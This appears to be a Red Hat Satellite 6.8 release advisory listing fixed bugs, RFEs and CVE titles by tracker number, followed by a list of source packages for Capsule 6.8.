1789924 - [RFE] As user I want to see a "disabled" status for Simple Content Access (Golden Ticketed) Orgs
1791654 - drop config_templates api endpoints and parameters
1791656 - drop deprecated host status endpoint
1791658 - drop reports api endpoint
1791659 - Removeuse_puppet_defaultapi params
1791663 - remove deprecated permissions api parameters
1791665 - drop deprecated compute resource uuid parameter
1792131 - [UI] Could not specify organization/location for users that come from keycloak
1792135 - Not able to login again if session expired from keycloak
1792174 - [RFE] Subscription report template
1792304 - When generating custom report, leave output format field empty
1792378 - [RFE] Long role names are cut off in the roles UI
1793951 - [RFE] Display request UUID on audits page
1794015 - When using boot disk based provisioning, sometimes foreman tries to recreate folder foreman_isos in the datastore even when the folder already exists
1794346 - Change the label for the flashing eye icon during user impersonation
1794641 - Sync status page's content are not being displayed properly.
1795809 - HTML tags visible on paused task page
1796155 - [RFE] host_collections not available in reporting engine unless safe mode disabled
1796205 - iso upload: correctly check if upload directory exists
1796225 - CVE-2020-7238 netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling
1796259 - loading subscriptions page is very slow
1796697 - Unable to list/enable EUS repositories on the RHEL clients registered in the satellite server with org_environment contentAccessMode
1798489 - [RHSSO] - If Access Token Lifespan is set to 5 mins then the user is getting sign out instead after idle SSO timeout
1798668 - Configure default MongoDB WiredTiger cache to be 20% of RAM in the Satellite server
1799480 - CLI - hammer repository info shows blank sync status if the repository sync is in warning/error state.
1800503 - In Hammer, it is not possible to set default keyboard layout for a RHEV host
1801264 - CVE-2020-5217 rubygem-secure_headers: directive injection when using dynamic overrides with user input
1801286 - CVE-2020-5216 rubygem-secure_headers: limited header injection when using dynamic overrides with user input
1802529 - Repository sync in tasks page shows percentage in 17 decimal points
1802631 - Importing Ansible variables yields NoMethodError: undefined methodmap' for nil:NilClass (initialize_variables) [variables_importer.rb]
1803846 - Red Hat Insights Risk Summary shows systems at risk while there are none
1804496 - While performing bulk actions, unable to select all tasks under Monitor --> Tasks page.
1804651 - Missing information about "Create Capsule" via webUI
1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages
1805727 - Default Custom Repository download policy setting refers to old name (Default Repository download policy) in satellite 6.7
1806713 - hypervisor checkin fails with cp_consumer_hypervisor_ukey error
1806842 - Disabling dynflow_enable_console from setting should hide "Dynflow console" in Tasks
1806897 - Red Hat Inventory Uploads fail with NoMethodError: undefined method mtu'
1807042 - [RFE] Support additional disks for VM on Azure Compute Resource
1807321 - A non-admin users with view recurring_logics permissions are unable to list recurring logics.
1807829 - Generated inventory file doesn't exist
1807946 - Multiple duplicate index entries are present in foreman database
1808843 - Satellite lists unrelated RHV storage domains using v4 API
1810250 - Unable to delete repository - Content with ID could not be found
1810549 - dropping packets to qdrouterd triggers a memory leak in qpid-proton 0.28.0-2 libraries used by goferd
1810774 - Applying errata via Host Collection the errata are trying to be applied to all hosts associated with the host collection
1811390 - Links to an errata list of a repository lack repositoryId in URI and points to generic "errata" page instead
1812031 - Improve regenerate applicability tasks performance by querying NEVRA only data from repo_content_units
1812858 - Satellite Inventory Plugin does not appear to make reports which match yupana's API specification
1812904 - 'Hypervisors' task fails with 'undefined method[]' for nil:NilClass' error
1813005 - Prevent --tuning option to be applied in Capsule servers
1813313 - [Tracker] Test HTTP UEFI on IPv6 (QA only tracker)
1814095 - Applicable errata not showing up for module stream errata
1815104 - Locked provisioning template should not be allowed to add audit comment
1815135 - hammer does not support description for custom repositories
1815146 - Backslash escapes when downloading a JSON-formatted report multiple times
1815608 - Content Hosts has Access to Content View from Different Organization
1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking
1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config
1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap
1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core
1816699 - Satellite Receptor Installer role can miss accounts under certain conditions
1816720 - CVE-2020-7942 puppet: Arbitrary catalog retrieval
1816853 - Report generated by Red Hat Inventory Uploads is empty.
1817215 - Admin must be able to provide all the client ids involved inside Satellite settings.
1817224 - Loading one org's content view when switching to a different org
1817481 - Plugin does not set page
1817728 - Default task polling is too frequent at scale
1817874 - After data upload from satellite UI it is not visible on cloud.redhat.com.
1818062 - Deprecated message about katello agent being shown on content host registration page
1818816 - Web console should open in a new tab/window
1819145 - [RFE] Incorporate apipie-dsl to document template macros, provided as one-time generated HTML document
1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider..RmiProvider
1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane
1820193 - Deleted Global Http Proxy is still being used during repository sync.
1820245 - reports in JSON format can't handle unicode characters
1821182 - [Repository] - Packages are not getting synced with rpm-with-sha-512
1821335 - Inventory plugin captures information for systems with any entitlement
1821457 - [RFE] Capsules shouldn't update hosts' "Registered through" facts on the Satellite server in a load-balanced configuration.
1821629 - Eager zero seems to do nothing
1821651 - Manifest import task progress remains at 0.
1821752 - New version of the plugin is available: 1.0.5
1822039 - Get HTTP error when deploying the virt-who configure plugin
1822560 - Unable to sync large openshift docker repos
1823905 - Update distributor version to sat-6.7
1823991 - [RFE] Add a more performant way to sort reports
1824183 - Virtual host get counted as physical hosts on cloud.redhat.com
1824931 - After upgrading to Satellite 6.7 the Tasks page in WebUI goes "Blank"
1825760 - schedule inventory plugin sync failed due to 'organization_id' typecasting issue.
1825930 - [Regression] RedHat Insights client proxying stopped working due to missing proxy
1825978 - Manifest refresh failed with 'Katello::Errors::CandlepinError Invalid credentials.' error
1826298 - even when I cancel ReX job, remediation still shows it as running
1826340 - [RFE] Ability to provision a VM using Red Hat Gold BYOS images
1826515 - [RFE] Consume Candlepin events via STOMP
1826625 - Improve performance of externalNodes
1826678 - New version of the plugin is available: 2.0.6
1826734 - Tasks uses wrong controller name for bookmarks
1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop
1827389 - Manifest import and delete calls Actions::Pulp::Repository::Refresh for non-Library repositories
1827583 - Installing dhcp_isc and dhcp_remote_isc fails with "You cannot specify the same gem twice with different version requirements.....You specified: rsec (< 1) and rsec (>= 0)"
1828257 - Receptor init file missing [Install] section, receptor service won't run after restart
1828486 - CVE-2020-7943 puppet: puppet server and puppetDB may leak sensitive information via metrics API
1828549 - Manifest Certificate Exposed by Unprivileged User
1828682 - Create compute resource shows console error 'Cannot read property 'aDataSort' of undefined'
1828789 - [RFE] Satellite installer should support installing the Satellite Inventory Provider by default
1828868 - Add keep alive option in Receptor node
1829487 - Ansible verbosity level does not work
1829766 - undefined method tr' for nil:NilClass when trying to get a new DHCP lease from infoblox
1830253 - Default job templates are not locked
1830403 - Capsule sync fails when promoting a content view to more than one lifecyle env at the same time
1830834 - Unable to update default value of a smart class parameter (Sql query error).
1830860 - Refactor loading regions based on subscription dynamically
1830882 - Red Hat Satellite brand icon is missing
1830884 - bootstrap.py script tries to yum install puppet package that is not in rhel-7-server-satellite-tools-6.7-rpms repo
1831528 - CVE-2020-5267 rubygem-actionview: views that use thejorescape_javascriptmethods are susceptible to XSS attacks
1833031 - Improve RH account ID fetching in cloud connector playbook
1833035 - Add remediation bulk ack message (i.e. all hosts for a given run has finished)
1833039 - Introduce error code to playbook_run_finished response type
1833311 - "Failed to save: Failed to save when overriding parameters for ansible, cause: Default value is invalid" while creating scap policy with ansible deployment option.
1834302 - --enable-foreman-plugin-rh-cloud fails: Execution of '/bin/yum -d 0 -e 0 -y install tfm-rubygem-foreman_rh_cloud' returned 1: Error: Nothing to do
1834377 - Disable mongo FTDC
1834866 - Missing macro for "registered_at" host subscription facet
1834898 - Login Page background got centralized and cropped
1835189 - Missing macro for "host_redhat_subscriptions" in host subscription facet
1835241 - Some applicability of the consumers are not recalculated after syncing a repository
1835882 - While executing "Configure Cloud Connector" playbook on Satellite 6.7 server it does not honour HTTP Proxy setting
1836155 - Support follow on rails, travis and i18n work for AzureRm plugin
1836771 - In satellite installation summary report, satellite should be mentioned instead of foreman.
1836774 - Some foreman services failed to start (pulp_streamer)
1836845 - "Generate at" in report template should be current date
1837951 - "invalid Unicode Property \p: /\b\perform various actions through those proxies\b(?!-)/" warning messages appears in dynflow-sidekiq@worker-hosts-queue
1838160 - 'Registered hosts' report does not list kernel release for rhsm clients
1838191 - Arrow position is on left rather in the middle under "Start Time"
1838281 - CVE-2020-8161 rubygem-rack: directory traversal in Rack::Directory
1838917 - Repositories are not showing their available Release versions due to a low default db pool size
1838963 - Hypervisors from Satellite, never makes their way to HBI
1838965 - Product name link is not working on the activation keys "Repository Sets" tab.
1839025 - Configure Cloud Connector relies on information which is no longer provided by the API
1839649 - satellite-installer --reset returns a traceback
1839726 - Bring tfm-rubygem-foreman_leapp to downstream builds
1839779 - undefined local variable or methodimplicit_order_column' for # on GET request to /discovery_rules endpoint
1839966 - New version of the plugin is available: 2.0.7
1840166 - ERF42-4995 [Foreman::Exception]: Invalid authenticity token message displayed with traceback, If re-login the machine after session timed-out .
1840191 - Validate parameters passed by receptor to the receptor-satellite plugin
1840218 - ArgumentError: wrong number of arguments
1840525 - Content host list doesn't update after the successful deletion of content host.
1840635 - Proxy has failed to load one or more features (Realm)
1840723 - Selected scenario is DISABLED, can not continue
1840745 - Satellite installation failed with puppet error " No Puppet module parser is installed"
1841098 - Failed to resolve package dependency while doing satellite upgrade.
1841143 - Known hosts key removal may fail hard, preventing host from being provisioned
1841573 - Clicking breadcrumb "Auth Source Ldaps" on Create LDAP Auth Source results in "The page you were looking for doesn't exist."
1841818 - icons missing on /pub download page
1842900 - ERROR! the role 'satellite-receptor' was not found in ...
1842943 - ~foreman-proxy/.ssh is a symlink to /usr/com/foreman-proxy/ssh/
1843406 - In 6.8, Receptor installation playbook's inputs are visible again
1843561 - Report templates duplicated
1843846 - Host - Registered Content Hosts report: "Safemode doesn't allow to access 'report_hraders' on #"
1843867 - Satellite-installer failed with argument error while upgrading the satellite from 6.7 to 6.8
1843926 - satellite-change-hostname fails when running nsupdate
1844142 - [RFE] Drop a subsription-manager fact with the satellite version
1845112 - Installer deploys outdated version of pxegrub2 mac template to TFTP
1845486 - [RFE] Able to select 'HTTP Proxy' during Compute Resource create for 'GCE' as similar to EC2
1845860 - hammer org add-provisioning-template command returns Error: undefined method []' for nil:NilClass
1845978 - CVE-2020-7663 rubygem-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser
1846254 - need to restart services after enabling leapp plugin
1846313 - Add index on locks for resource type and task id
1846317 - undefined methodklass' for nil:NilClass
1846421 - build pxe default do not work when more than 1 provider
1846593 - Satellite-installer failed with error "Could not find a suitable provider for foreman_smartproxy" while doing upgrade from 6.7 to 6.8
1847019 - Empty applicability for non-modular repos
1847063 - Slow manifest import and/or refresh
1847407 - load_pools macro not in list of macros
1847645 - Allow override of Katello's DISTRIBUTOR_VERSION
1847784 - Error updating system data on the server, see /var/log/rhsm/rhsm.log for more details.
1847840 - Libvirt note link leads to 404
1847871 - Combined Profile Update: ArgumentError: invalid argument: nil.
1848291 - Download kernel/initram for kexec asynchronously
1848535 - Unable to create a pure IPv6 host
1848538 - Failed to resolve the packages due to tfm-runtime package dependency in fm-upgrade(6.7 to 6.8)
1848902 - ERF42-0258 [Foreman::Exception]: is not valid, enter id or name
1848958 - CVE-2020-14195 jackson-databind: serialization in org.jsecurity.realm.jndi.JndiRealmFactory
1848962 - CVE-2020-14062 jackson-databind: serialization in com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool
1848966 - CVE-2020-14061 jackson-databind: serialization in weblogic/oracle-aqjms
1848973 - capsule-certs-generate suggests running foreman-installer --scenario foreman-proxy-content instead of satellite-installer --scenario capsule
1849141 - CVE-2020-8184 rubygem-rack: percent-encoded cookies can be used to overwrite existing prefixed cookie names
1849656 - ERROR! You cannot use loops on 'import_tasks' statements. You should use 'include_tasks' instead.
1849680 - Task progress decimal precision discrepancy between UI, CLI, and API
1849869 - Unable to recycle the dynflow executor
1850355 - Auth Source Role Filters are not working in Satellite 6.8
1850536 - Can't add RHEV with APIv3 through Hammer
1850914 - Checksum type "sha256" is not available for all units in the repository. Make sure those units have been downloaded
1850934 - Satellite-installer failed with error "Could not evaluate: Proxy xyz..com cannot be retrieved: unknown error (response 502)"
1851017 - Position of text cursor in ace-editor wrong and hence unable to edit templates
1851030 - [RFE] Upgrade Ansible used from RHEL to be 2.9
1851167 - Autoattach -> "undefined" subscription added
1851176 - Subscriptions do not provide any repository sets
1851952 - "candlepin_events FAIL Not running" and wont restart
1852371 - Allow http proxy ports by default
1852723 - Broken link for documentation on installation media page
1852733 - Inventory upload documentation redirects to default location
1852735 - New version of the plugin is available: 2.0.8
1853076 - large capsule syncs cause slow processing of dynflow tasks/steps
1853200 - foreman-rake-db:migrate Fails on "No indexes found on foreman_tasks_locks with the options provided"
1853280 - Content view filter is excluding modules and Packages when published after upgrading the Satellite from 6.6 to 6.7
1853463 - Plugin does not upload inventory - Permission denied /var/lib/foreman/red_hat_inventory/uploads/uploader.sh
1853504 - [Regression] Hammer export-legacy Fails with Composite Content Views
1853572 - Broken documentation link for 'RHV' in Compute Resource
1854138 - System purpose status should show as 'disabled' when Satellite is in Simple Content Access mode.
1854397 - Compliance reports are not being uploaded to satellite.
1854530 - PG::NotNullViolation when syncing hosts from cloud
1855008 - Host parameters are set after the host is created.
1855254 - Links to documentation broken in HTTP Proxies setup
1855348 - katello_applicability accidentally set to true at install
1855710 - 'Ensure RPM repository is configured and enabled' task says 'FIXME'
1856370 - Clicking on any other tab other than overview while on capsule synchronizing page, redirects to overview page.
1856379 - Add missing VM creation tests
1856401 - [RFE] Add module to create HTTP Proxy
1856831 - New version of the plugin is available: 2.0.9
1856837 - undefined method '#httpboot' for NilClass::Jail (NilClass) when creating an IPv6 only host
1857124 - Attempting to attach a subscription to an unregistered host results in ISE 500
1857146 - Unable to build a host bootdisk image due to missing dosfstools package - Failed to format the ESP image via mkfs.msdos
1857184 - selinux is preventing to build a bootdisk iso - Failed to format the ESP image via mkfs.msdos
1857377 - Capsule Upgrade Playbook fails with "Failed to initialize: NoMethodError - undefined method default_capsule' for Katello:Module"
1857506 - Capsule Upgrade Fail: satellite-installer --scenario capsule --upgrade throws NameError
1857572 - tailoring-file and scap-content command of hammer downloads file with wrong filename.
1857726 - Warnings are shown during the satellite package installation on RHEL 7.9
1858237 - Upgraded Satellite has duplicated katello_pools indexes
1858284 - CVE-2020-14334 foreman: unauthorized cache read on RPM-based installations through local user
1858819 - katello-certs-check output print foreman-installer--scenario katello instead satellite-installer --scenario satellite
1858855 - Creating compute resources on IPV6 network does not fail gracefully
1859158 - Unknown HTTPBoot EFI hosts are not directed to the grubx64.efi with a default grub conf
1859194 - load_hosts macro duplicated in a list of macros
1859276 - Need to update the deprecation warning message on Statistics and Trends page.
1859705 - Tomcat is not running on fresh Capsule installation
1859929 - User can perform other manifest actions while the first one starts
1860351 - 'Host - compare content hosts packages' report fails with error 'undefined method '#first' for NilClass'
1860407 - remote job-status table should not be re-loaded every second even if a job is running or completed
1860422 - Host with remediations can't be removed
1860430 - 'Host - compare content hosts packages' report: Safemode doesn't allow to access 'version'...
1860444 - After the system reboot, capsule setup(upgraded or newly installed 6.8 capsule) fails to start the tomcat service
1860519 - Browsing capsule /pub directory with https fails with forbidden don't have permission to access /pub/ error.
1860585 - Content Host Registration page showing version 6.7 for repos instead 6.8
1860587 - Documentation link in Administer -> About pointing to 6.6 document.
1860835 - Installed Packages not displayed on About page
1860957 - Unable to select an organization for sync management
1861367 - Import Template sync never completes
1861397 - UI dialog for Capsule Upgrade Playbook job doesn't state whitelist_options is required
1861422 - Error encountered while handling the response, replying with an error message ('plugin_config')
1861656 - smart-proxy-openscap-send command fails to upload reports to satellite.
1861724 - ipv6: host form in interfaces are showing Error generating IP: Bad Request
1861766 - Add ability to list traces by host with hammer
1861807 - Cancel/Abort button should be disabled once REX job is finish
1861816 - Error only on production builds: The Dynflow world was not initialized yet. If your plugin uses it, make sure to call Rails.application.dynflow.require! in some initializer
1861831 - satellite-change-hostname cannot change the satellite hostname after failing.
1861890 - Recommended repos do not match Satellite version
1861970 - Content -> Product doesn't work when no organization is selected
1862135 - updating hosts policy using bulk action fails with sql error
1862445 - compliance policy creation fails for ansible deployment option on upgraded satellite.
1862772 - Default repositories are not enabled, after registering a client with an Activation Key, to an org with Simple Content Access Mode in Red Hat Satellite 6
1865871 - Obfuscated hosts do not have domain reported
1865872 - Templates doc - examples on onepage.html are not processed
1865874 - Add inventory status to host
1865876 - Make recommendations count in hosts index a link
1865879 - Add automatic scheduler for insights sync
1865880 - Add an explanation how to enable insights sync
1865928 - Templates documentation help page has hard-coded Satellite setting value
1865943 - dynflow-sidekiq results in messages logs getting filled up more frequently
1866029 - Templates DSL documentation: Parts of description are put in <pre> tag
1866436 - host search filter does not work in job invocation page
1866461 - Run action is missing in job templates page
1866515 - ForemanVirtWhoConfigure::AuthSourceHiddenWithAuthentication is displayed on auth sources page
1866700 - Hammer CLI is missing "resolve" (traces) option for katello-tracer
1866710 - Wrong API endpoint path referenced for resolving host traces
1867239 - hammer content-view version incremental-update fails with ISE
1867287 - Error Row was updated or deleted by another transaction when deleting docker repository
1867311 - Upgrade fails when checkpoint_segments postgres parameter configured
1867399 - Receptor-satellite isn't able to deal with jobs where all the hosts are unknown to satellite
1867895 - API Create vmware ComputeResource fails with "Datacenter can't be blank"
1868183 - Unable to change virt-who hypervisor location.
1868971 - Receptor installation job doesn't properly escape data it puts into receptor.conf
1869640 - client-dispatcher: wrong number of arguments (given 0, expected 1..3) (ArgumentError)' messages come in upgrade and installation.
1869812 - Tasks fail to complete under load
1870657 - Make rake console run as a dynflow client to allow access to features provided by dynflow
1871016 - managercli.py:1364 - Error: Unable to retrieve service levels: HTTP error (404 - Not Found)
1871434 - theme css ".container" class rule is too generic
1871729 - ansible-runner implementation depends on third party repository for ansible-runner package.
1871815 - Satellite Ansible Collection - Provisioning a host fails with timeout
1871978 - Bug in provisioning_template Module
1872014 - Enable web console on host error in "Oops, we're sorry but something went wrong ERF42-5962 [Foreman::Exception]: No template mapped to feature Enable web console"
1872041 - Host search returns incorrect result
1873408 - Updating the CDN URL is manifest works fine but creates some tasks which remains in planned state with success result
1873926 - CVE-2020-14380 Satellite: Local user impersonation by Single sign-on (SSO) user leads to account takeover
1874143 - Red Hat Inventory Uploads does not use proxy
1874160 - Changing Content View of a Content Host needs to better inform the user around client needs
1874168 - Sync Plan fails with 'uninitialized constant Actions::Foreman::Exception'
1874171 - [RFE] Allow Subscription-manager service plugin for zypper (SLES) to set autorefresh in repo file
1874172 - [6.7] Unable to re-import subscriptions in large environment (60k+ content hosts)
1874175 - After upgrading to 6.7 and promoting content, Capsule sync is extremely slow
1874176 - Unable to search by value of certain Hostgroup parameter
1874422 - Hits Sync uses only old proxy setting
1874619 - Hostgroup tag is never reported in slice
1875357 - After upgrade server response check failed for candlepin.
1875426 - Azure VM provision fails with errorrequests.exceptions.HTTPError: 502 Server Error: Proxy Error for url`
1875660 - Reporting Template macros host_cores is not working as expected
1875667 - Audit page list incorrect search filter
1877307 - [Authentication] External auth login using Kerberos SSO is failing for AD and IDM on Satellite 6.8 only
1877354 - [Sat6/Bug] RHEL8 systems generate false positive warnings about repo binding
1877443 - Post Satellite 6.8 Upgrade AD authentication via LDAP fails when using an A record which returns 42 entries
1877452 - content set mappings for satellite-tools-6.8-for-rhel-8 AUS repos are missing from cdn/cs_mappings-.csv
1877520 - content set mappings for satellite-tools-6.8-for-rhel-8 EUS repos are missing from cdn/cs_mappings-.csv
1877542 - content set mappings for rhel7 satellite-tools-6.8 EUS repos are missing from cdn/cs_mappings-.csv
1878194 - In Capsule upgrade, "yum update" dump some error messages.
1878556 - PXE provisioning in satellite 6.8 requires httpboot enabled
1878693 - Unable to perform image based deployment using hosts module from Red Hat Satellite Ansible Collections
1878850 - creating host from hg doesn't resolves the user-data template
1879151 - Remote execution status not updating with large number of hosts
1879448 - Add hits details to host details page
1879451 - Stop uploading if Satellite's setting is disconnected
1879453 - Add plugin version to report metadata
1879571 - unable to kexec discovered hosts - satellite tries to reach wrong IP
1880637 - [6.8] satellite-installer always runs upgrade steps
1881066 - Safemode doesn't allow to access 'host_cores' on #
1881078 - Use Passenger instead of Puma as the Foreman application server
1881988 - [RFE] IPv6 support for Satellite 6.8
1882276 - Satellite installation fails at execution of '/usr/sbin/foreman-rake -- config -k 'remote_execution_cockpit_url' -v '/webcon/=%{host}''
1882389 - Search query in template for LEAPP upgrade should be pre-filled when running from pre-upgrade results
1883093 - installer-upgrade failed with error "Could not evaluate: Proxy XYZ.com cannot be retrieved: unknown error (response 500)"
1883472 - [Sat6.8/Bug] when registering more than ~240 in parallel getting this error "HTTP error (500 - Internal Server Error): Unable to register system, not all services available"
1887483 - Access insights pages refer to non-existing stylesheets, resulting in completely broken visuals
1887489 - Insights rules can't be loaded on freshly installed Satellite system
1887808 - Satellite-installer fails because of outdated RHSCL repository on DVD ISO
- Package List:
Red Hat Satellite Capsule 6.8:
Source: ansible-collection-redhat-satellite-1.3.0-1.el7sat.src.rpm ansible-runner-1.4.6-1.el7ar.src.rpm ansiblerole-foreman_scap_client-0.0.5-1.el7sat.src.rpm ansiblerole-insights-client-1.7.1-1.el7sat.src.rpm ansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.src.rpm createrepo_c-0.7.4-1.el7sat.src.rpm foreman-2.1.2.19-1.el7sat.src.rpm foreman-bootloaders-redhat-202005201200-1.el7sat.src.rpm foreman-discovery-image-3.6.7-1.el7sat.src.rpm foreman-discovery-image-service-1.0.0-3.el7sat.src.rpm foreman-installer-2.1.2.8-1.el7sat.src.rpm foreman-proxy-2.1.2-2.el7sat.src.rpm future-0.16.0-11.el7sat.src.rpm gofer-2.12.5-7.el7sat.src.rpm hfsplus-tools-332.14-12.el7.src.rpm katello-3.16.0-1.el7sat.src.rpm katello-certs-tools-2.7.1-1.el7sat.src.rpm katello-client-bootstrap-1.7.5-1.el7sat.src.rpm katello-selinux-3.4.0-1.el7sat.src.rpm kobo-0.5.1-1.el7sat.src.rpm libmodulemd-1.7.0-1.pulp.el7sat.src.rpm libsolv-0.7.4-4.pulp.el7sat.src.rpm libwebsockets-2.4.2-2.el7.src.rpm livecd-tools-20.4-1.6.el7sat.src.rpm mod_xsendfile-0.12-11.el7sat.src.rpm ostree-2017.1-2.atomic.el7.src.rpm pulp-2.21.3-1.el7sat.src.rpm pulp-docker-3.2.7-1.el7sat.src.rpm pulp-katello-1.0.3-1.el7sat.src.rpm pulp-ostree-1.3.1-2.el7sat.src.rpm pulp-puppet-2.21.3-2.el7sat.src.rpm pulp-rpm-2.21.3-2.el7sat.src.rpm puppet-agent-6.14.0-2.el7sat.src.rpm puppet-agent-oauth-0.5.1-3.el7sat.src.rpm puppet-foreman_scap_client-0.4.0-1.el7sat.src.rpm puppetlabs-stdlib-4.25.1-2.el7sat.src.rpm puppetserver-6.13.0-1.el7sat.src.rpm pycairo-1.16.3-9.el7sat.src.rpm pygobject3-3.28.3-2.el7sat.src.rpm python-amqp-2.2.2-5.el7sat.src.rpm python-anyjson-0.3.3-11.el7sat.src.rpm python-apypie-0.2.2-1.el7sat.src.rpm python-billiard-3.5.0.3-3.el7sat.src.rpm python-blinker-1.3-2.el7sat.src.rpm python-celery-4.0.2-9.el7sat.src.rpm python-click-6.7-9.el7sat.src.rpm python-crane-3.3.1-9.el7sat.src.rpm python-daemon-2.1.2-7.el7at.src.rpm python-django-1.11.29-1.el7sat.src.rpm python-flask-0.12.2-4.el7sat.src.rpm python-gnupg-0.3.7-1.el7ui.src.rpm python-isodate-0.5.4-12.el7sat.src.rpm python-itsdangerous-0.24-15.el7sat.src.rpm python-jinja2-2.10-10.el7sat.src.rpm python-jmespath-0.9.0-6.el7_7.src.rpm python-kid-0.9.6-11.el7sat.src.rpm python-kombu-4.0.2-13.el7sat.src.rpm python-lockfile-0.11.0-10.el7ar.src.rpm python-markupsafe-0.23-21.el7sat.src.rpm python-mongoengine-0.10.5-2.el7sat.src.rpm python-nectar-1.6.2-1.el7sat.src.rpm python-oauth2-1.5.211-8.el7sat.src.rpm python-okaara-1.0.37-2.el7sat.src.rpm python-pexpect-4.6-1.el7at.src.rpm python-psutil-5.0.1-3.el7sat.src.rpm python-ptyprocess-0.5.2-3.el7at.src.rpm python-pycurl-7.43.0.2-4.el7sat.src.rpm python-pymongo-3.2-2.el7sat.src.rpm python-qpid-1.35.0-5.el7.src.rpm python-semantic_version-2.2.0-6.el7sat.src.rpm python-simplejson-3.2.0-1.el7sat.src.rpm python-twisted-16.4.1-12.el7sat.src.rpm python-vine-1.1.3-6.el7sat.src.rpm python-werkzeug-0.12.2-5.el7sat.src.rpm python-zope-interface-4.0.5-4.el7.src.rpm qpid-cpp-1.36.0-28.el7amq.src.rpm qpid-dispatch-1.5.0-4.el7.src.rpm qpid-proton-0.28.0-3.el7.src.rpm redhat-access-insights-puppet-1.0.1-1.el7sat.src.rpm repoview-0.6.6-11.el7sat.src.rpm rubygem-fast_gettext-1.1.0-4.el7sat.src.rpm rubygem-highline-1.7.8-3.el7sat.src.rpm rubygem-newt-0.9.6-3.el7sat.src.rpm rubygem-oauth-0.5.4-2.el7sat.src.rpm saslwrapper-0.22-5.el7sat.src.rpm satellite-6.8.0-1.el7sat.src.rpm satellite-installer-6.8.0.11-1.el7sat.src.rpm tfm-6.1-1.el7sat.src.rpm tfm-rubygem-algebrick-0.7.3-6.el7sat.src.rpm tfm-rubygem-ansi-1.5.0-2.el7sat.src.rpm tfm-rubygem-apipie-params-0.0.5-5.el7sat.src.rpm tfm-rubygem-bundler_ext-0.4.1-4.el7sat.src.rpm tfm-rubygem-clamp-1.1.2-5.el7sat.src.rpm tfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.src.rpm tfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.src.rpm tfm-rubygem-domain_name-0.5.20160310-4.el7sat.src.rpm tfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.src.rpm tfm-rubygem-faraday-0.15.4-1.el7sat.src.rpm tfm-rubygem-faraday_middleware-0.13.1-2.el7sat.src.rpm tfm-rubygem-ffi-1.12.2-1.el7sat.src.rpm tfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.src.rpm tfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.src.rpm tfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.src.rpm tfm-rubygem-gssapi-1.2.0-6.el7sat.src.rpm tfm-rubygem-hashie-3.6.0-1.el7sat.src.rpm tfm-rubygem-highline-1.7.8-4.el7sat.src.rpm tfm-rubygem-http-cookie-1.0.2-5.el7sat.src.rpm tfm-rubygem-infoblox-3.0.0-3.el7sat.src.rpm tfm-rubygem-journald-logger-2.0.4-2.el7sat.src.rpm tfm-rubygem-journald-native-1.0.11-2.el7sat.src.rpm tfm-rubygem-jwt-2.2.1-1.el7sat.src.rpm tfm-rubygem-kafo-4.1.0-3.el7sat.src.rpm tfm-rubygem-kafo_parsers-1.1.0-3.el7sat.src.rpm tfm-rubygem-kafo_wizards-0.0.1-4.el7sat.src.rpm tfm-rubygem-little-plugger-1.1.4-1.el7sat.src.rpm tfm-rubygem-logging-2.2.2-6.el7sat.src.rpm tfm-rubygem-logging-journald-2.0.0-2.el7sat.src.rpm tfm-rubygem-mime-types-3.2.2-4.el7sat.src.rpm tfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.src.rpm tfm-rubygem-multi_json-1.14.1-1.el7sat.src.rpm tfm-rubygem-multipart-post-2.0.0-1.el7sat.src.rpm tfm-rubygem-mustermann-1.0.2-4.el7sat.src.rpm tfm-rubygem-net-ssh-4.2.0-1.el7sat.src.rpm tfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.src.rpm tfm-rubygem-netrc-0.11.0-3.el7sat.src.rpm tfm-rubygem-openscap-0.4.9-3.el7sat.src.rpm tfm-rubygem-powerbar-2.0.1-2.el7sat.src.rpm tfm-rubygem-rack-2.2.3-1.el7sat.src.rpm tfm-rubygem-rack-protection-2.0.3-4.el7sat.src.rpm tfm-rubygem-rb-inotify-0.9.7-5.el7sat.src.rpm tfm-rubygem-rest-client-2.0.2-3.el7sat.src.rpm tfm-rubygem-rkerberos-0.1.5-18.el7sat.src.rpm tfm-rubygem-rsec-0.4.3-4.el7sat.src.rpm tfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.src.rpm tfm-rubygem-rubyipmi-0.10.0-6.el7sat.src.rpm tfm-rubygem-sequel-5.7.1-2.el7sat.src.rpm tfm-rubygem-sinatra-2.0.3-4.el7sat.src.rpm tfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.src.rpm tfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.src.rpm tfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.src.rpm tfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.src.rpm tfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.src.rpm tfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.src.rpm tfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.src.rpm tfm-rubygem-sqlite3-1.3.13-5.el7sat.src.rpm 